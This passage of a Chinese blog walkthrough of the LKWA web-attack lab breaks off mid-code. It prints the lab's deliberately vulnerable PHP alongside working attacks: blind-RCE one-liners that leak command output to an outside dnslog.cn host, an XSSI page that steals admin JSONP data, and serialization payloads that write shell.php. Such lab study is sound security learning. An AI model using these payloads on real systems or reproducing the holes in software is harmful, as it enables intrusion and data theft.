<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前言项目地址：weev3&#x2F;LKWA: Lesser Known Web Attack Lab (github.com) Blind RCE123456789101112131415161718192021222324252627282930&lt;?phpinclude(&quot;sidebar.php&quot;);&#x2F;** * Blind RCE *&#x2F;class Rce &#123;">
<meta property="og:type" content="article">
<meta property="og:title" content="LKWA 靶场学习">
<meta property="og:url" content="http://example.com/2023/04/25/Web/LKWA/index.html">
<meta property="og:site_name" content="Pursue&#39;s blog">
<meta property="og:description" content="前言项目地址：weev3&#x2F;LKWA: Lesser Known Web Attack Lab (github.com) Blind RCE123456789101112131415161718192021222324252627282930&lt;?phpinclude(&quot;sidebar.php&quot;);&#x2F;** * Blind RCE *&#x2F;class Rce &#123;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230424200004421.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230424201327320.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230424203311479.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/phar.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230425143449527.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230425143637769.png">
<meta property="og:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230425150948817.png">
<meta property="article:published_time" content="2023-04-24T16:00:00.000Z">
<meta property="article:modified_time" content="2024-03-04T02:03:15.994Z">
<meta property="article:author" content="Pursue">
<meta property="article:tag" content="LKWA">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230424200004421.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>LKWA 靶场学习</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.1.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://gitee.com/rmrfsad/rmrfsad">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2023/04/30/Penetration/vulnhub/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2023/04/05/iot/CVE-2021-27239/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/04/25/Web/LKWA/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/04/25/Web/LKWA/&text=LKWA 靶场学习"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/04/25/Web/LKWA/&is_video=false&description=LKWA 靶场学习"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=LKWA 靶场学习&body=Check out this article: http://example.com/2023/04/25/Web/LKWA/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/04/25/Web/LKWA/&name=LKWA 靶场学习&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/04/25/Web/LKWA/&t=LKWA 靶场学习"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Blind-RCE"><span class="toc-number">2.</span> <span class="toc-text">Blind RCE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSSI"><span class="toc-number">3.</span> <span class="toc-text">XSSI</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-Object-Injection"><span class="toc-number">4.</span> <span class="toc-text">PHP Object Injection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-Object-Injection-cookie"><span class="toc-number">5.</span> <span class="toc-text">PHP Object Injection(cookie)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-Object-Injection-Object-Reference"><span class="toc-number">6.</span> <span class="toc-text">PHP Object Injection(Object Reference)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHAR-Deserialization"><span class="toc-number">7.</span> <span class="toc-text">PHAR Deserialization</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF"><span class="toc-number">8.</span> <span class="toc-text">SSRF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Variable-variable"><span class="toc-number">9.</span> <span class="toc-text">Variable variable</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        LKWA 靶场学习
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Pursue</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-04-24T16:00:00.000Z" class="dt-published" itemprop="datePublished">2023-04-25</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Web/">Web</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/LKWA/" rel="tag">LKWA</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>项目地址：<a target="_blank" rel="noopener" href="https://github.com/weev3/LKWA">weev3&#x2F;LKWA: Lesser Known Web Attack Lab (github.com)</a></p>
<h2 id="Blind-RCE"><a href="#Blind-RCE" class="headerlink" title="Blind RCE"></a>Blind RCE</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;sidebar.php&quot;</span>);</span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Blind RCE</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Rce</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$user_input</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$level</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;user_input = <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;user_input&#x27;</span>]) ? <span class="variable">$_POST</span>[<span class="string">&#x27;user_input&#x27;</span>] : <span class="literal">null</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;level = <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;level&#x27;</span>]) ? <span class="variable">$_POST</span>[<span class="string">&#x27;level&#x27;</span>] : <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">start</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">empty</span>(<span class="variable language_">$this</span>-&gt;user_input)) &#123;</span><br><span class="line">       </span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">else</span>&#123;</span><br><span class="line">        		<span class="title function_ invoke__">exec</span>(<span class="variable">$this</span>-&gt;user_input);		</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$rce</span> = <span class="keyword">new</span> <span class="title class_">Rce</span>();</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$_POST</span>))</span><br><span class="line">&#123;</span><br><span class="line">    <span class="variable">$rce</span>-&gt;<span class="title function_ invoke__">start</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>没有echo，也就没有回显，只是执行。</p>
<p>利用 dnslog 回显的特点，一个免费的网站：<a target="_blank" rel="noopener" href="http://www.dnslog.cn/">DNSLog Platform</a>。点击首先获取一个 SubDomain。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">ping `whoami`.9et4ix.dnslog.cn</span><br><span class="line"><span class="meta prompt_">-&gt; </span><span class="language-bash">ping admin.9et4ix.dnslog.cn</span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">windows</span></span><br><span class="line">ping %USERNAME%.9et4ix.dnslog.cn</span><br><span class="line"></span><br><span class="line">ls / | awk -F &#x27; &#x27; &#x27;&#123;system(&quot;ping -c 2 &quot;NR&quot;.9et4ix.dnslog.cn&quot;)&#125;&#x27;		# 查看根目录文件数</span><br><span class="line">ls / | awk -F&#x27; &#x27; &#x27;NR==1&#123;system(&quot;ping -c 1 &quot;$0&quot;.9et4ix.dnslog.cn&quot;)&#125;&#x27;		# 查看根目录的第一个文件</span><br><span class="line">ping -c 1 `cat /flag`.9et4ix.dnslog.cn</span><br></pre></td></tr></table></figure>



<h2 id="XSSI"><a href="#XSSI" class="headerlink" title="XSSI"></a>XSSI</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// xssi.php</span></span><br><span class="line">&lt;script&gt;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">get</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    $.<span class="title function_ invoke__">ajax</span>(		// 向服务器中发送异步 HTTP 请求</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="attr">url</span>:<span class="string">&quot;../api/user&quot;</span>,</span><br><span class="line">            <span class="attr">type</span>:<span class="string">&quot;GET&quot;</span>,</span><br><span class="line">            <span class="attr">async</span>:<span class="literal">true</span>,			// 异步请求</span><br><span class="line">            <span class="attr">success</span>:function(parse)&#123;		<span class="comment">// 定义一个成功的回调函数，在服务器成功返回数据后被调用</span></span><br><span class="line">                <span class="keyword">for</span> (<span class="keyword">var</span> i in parse)&#123;		<span class="comment">// 回调函数首先遍历服务器返回的数据对象 parse 中的所有属性和值</span></span><br><span class="line">                    <span class="comment">// 对于每个属性名 i，通过 $() 方法选取对应的 HTML 元素，并设置其文本内容为该属性的值</span></span><br><span class="line">                    $(<span class="string">&quot;#&quot;</span> + i).<span class="title function_ invoke__">text</span>(parse[i]); </span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    );</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">get</span>();</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>存在一个 ajax 请求，AJAX 技术通过在客户端浏览器中运行 JavaScript 代码，向服务器发送异步 HTTP 请求，接收和处理服务器返回的数据，并将数据插入到 Web 页面中已经存在的 HTML 标签内。</p>
<p>在 .&#x2F;api 目录下，存在重写也就是将 user 定位到 user.php。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// user.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;login_user&#x27;</span>]) &amp;&amp; <span class="variable">$_SESSION</span>[<span class="string">&#x27;login_user&#x27;</span>] == <span class="string">&quot;admin&quot;</span>)&#123;</span><br><span class="line">  <span class="variable">$myObj</span> = <span class="keyword">new</span> \<span class="built_in">stdClass</span>();     <span class="comment">// 创建默认的空对象</span></span><br><span class="line">  <span class="variable">$myObj</span>-&gt;name = <span class="string">&quot;admin&quot;</span>;</span><br><span class="line">  <span class="variable">$myObj</span>-&gt;token=<span class="title function_ invoke__">time</span>()+<span class="number">2</span>*<span class="number">24</span>*<span class="number">60</span>*<span class="number">60</span>;</span><br><span class="line">  <span class="variable">$data</span> = <span class="title function_ invoke__">json_encode</span>(<span class="variable">$myObj</span>);			<span class="comment">// 编码为 JSON 字符串</span></span><br><span class="line">    <span class="comment">// 如果包含了 callback 参数，那么返回 JSONP</span></span><br><span class="line">  <span class="keyword">if</span>(<span class="title function_ invoke__">array_key_exists</span>(<span class="string">&#x27;callback&#x27;</span>, <span class="variable">$_GET</span>))&#123;</span><br><span class="line"></span><br><span class="line">      <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: text/javascript; charset=utf8&#x27;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Access-Control-Max-Age: 3628800&#x27;</span>);</span><br><span class="line">      <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Access-Control-Allow-Methods: GET, POST, PUT, DELETE&#x27;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="variable">$callback</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;callback&#x27;</span>];</span><br><span class="line">      <span class="keyword">echo</span> <span class="variable">$callback</span>.<span class="string">&#x27;(&#x27;</span>.<span class="variable">$data</span>.<span class="string">&#x27;);&#x27;</span>;		<span class="comment">// 形成函数调用的语法结构</span></span><br><span class="line"></span><br><span class="line">  &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">      <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: application/json; charset=utf8&#x27;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">echo</span> <span class="variable">$data</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">  <span class="variable">$myObj</span> = <span class="keyword">new</span> \<span class="built_in">stdClass</span>();</span><br><span class="line">  <span class="variable">$myObj</span>-&gt;name = <span class="string">&quot;&quot;</span>;</span><br><span class="line">  <span class="variable">$myObj</span>-&gt;token=<span class="string">&quot;&quot;</span>;</span><br><span class="line">  <span class="variable">$data</span> = <span class="title function_ invoke__">json_encode</span>(<span class="variable">$myObj</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="title function_ invoke__">array_key_exists</span>(<span class="string">&#x27;callback&#x27;</span>, <span class="variable">$_GET</span>))&#123;</span><br><span class="line"></span><br><span class="line">      <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: text/javascript; charset=utf8&#x27;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Access-Control-Max-Age: 3628800&#x27;</span>);</span><br><span class="line">      <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Access-Control-Allow-Methods: GET, POST, PUT, DELETE&#x27;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="variable">$callback</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;callback&#x27;</span>];</span><br><span class="line">      <span class="keyword">echo</span> <span class="variable">$callback</span>.<span class="string">&#x27;(&#x27;</span>.<span class="variable">$data</span>.<span class="string">&#x27;);&#x27;</span>;</span><br><span class="line"></span><br><span class="line">  &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">      <span class="comment">// normal JSON string</span></span><br><span class="line">      <span class="title function_ invoke__">header</span>(<span class="string">&#x27;Content-Type: application/json; charset=utf8&#x27;</span>);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">echo</span> <span class="variable">$data</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>JSONP（JSON with Padding）是一种跨域数据请求技术，JSONP 在前端页面中通过动态插入一个 <code>&lt;script&gt;</code> 标签，向另一个域名的服务器发送请求，请求的 URL 中包含一个回调函数名作为参数。后台服务器接收到这个请求并根据参数生成对应格式的 JSON 数据返回，并将其中的数据作为参数传递给回调函数。在前端页面中，这个回调函数会在 <code>&lt;script&gt;</code> 标签加载完毕时自动执行，从而实现对 JSON 数据的获取和处理。</p>
<p>下面是一个简单的 JSONP 请求示例：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">getJSONP</span>(<span class="params">url, callback</span>) &#123;		<span class="comment">// 向服务器请求 JSONP 数据</span></span><br><span class="line">  <span class="keyword">var</span> script = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;script&#x27;</span>);</span><br><span class="line">  script.<span class="property">src</span> = url + <span class="string">&#x27;&amp;callback=&#x27;</span> + callback;		<span class="comment">// 传入回调函数</span></span><br><span class="line">  <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(script);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">handleData</span>(<span class="params">data</span>) &#123;</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;Received data:&#x27;</span>, data);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">getJSONP</span>(<span class="string">&#x27;https://example.com/api/data?format=json&#x27;</span>, <span class="string">&#x27;handleData&#x27;</span>);</span><br></pre></td></tr></table></figure>

<p>这里逻辑就清楚了，当我们以 GET 形式请求 <code>/api/user.php</code>，如果存在 SEESION 的值且为 admin 的话就可以那道 JSONP 数据了。</p>
<p>首先把浏览器的 cookie 清除访问：</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230424200004421.png" alt="image-20230424200004421"></p>
<p>再次登录后访问：</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230424201327320.png" alt="image-20230424201327320"></p>
<p>利用脚本：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">function</span> <span class="title function_">xssi</span>(<span class="params">data</span>)&#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="title function_">alert</span>(<span class="title class_">JSON</span>.<span class="title function_">stringify</span>(data));</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">        </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">script</span> <span class="attr">src</span>=<span class="string">&quot;http://www.lkwa.com/api/user?callback=xssi&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>



<h2 id="PHP-Object-Injection"><a href="#PHP-Object-Injection" class="headerlink" title="PHP Object Injection"></a>PHP Object Injection</h2><p>常规的反序列化</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Foo</span></span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$filename</span>, <span class="variable">$data</span></span>) </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;filename = <span class="variable">$filename</span> . <span class="string">&quot;.txt&quot;</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;data = <span class="variable">$data</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$this</span>-&gt;filename, <span class="variable">$this</span>-&gt;data);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$x</span> = <span class="keyword">new</span> <span class="title class_">Foo</span>(<span class="string">&quot;shell.php&quot;</span>, <span class="string">&quot;&lt;? php phpinfo(); ?&gt;&quot;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ invoke__">serialize</span>(<span class="variable">$x</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h2 id="PHP-Object-Injection-cookie"><a href="#PHP-Object-Injection-cookie" class="headerlink" title="PHP Object Injection(cookie)"></a>PHP Object Injection(cookie)</h2><p>可以发现 cookie 存在反序列化内容</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230424203311479.png" alt="image-20230424203311479"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Object Injection via Cookie</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Foo</span></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$cmd</span> = <span class="string">&#x27;phpinfo();&#x27;</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="comment">// eval($this-&gt;cmd);</span></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$x</span> = <span class="keyword">new</span> <span class="title class_">Foo</span>();</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">urlencode</span>(<span class="title function_ 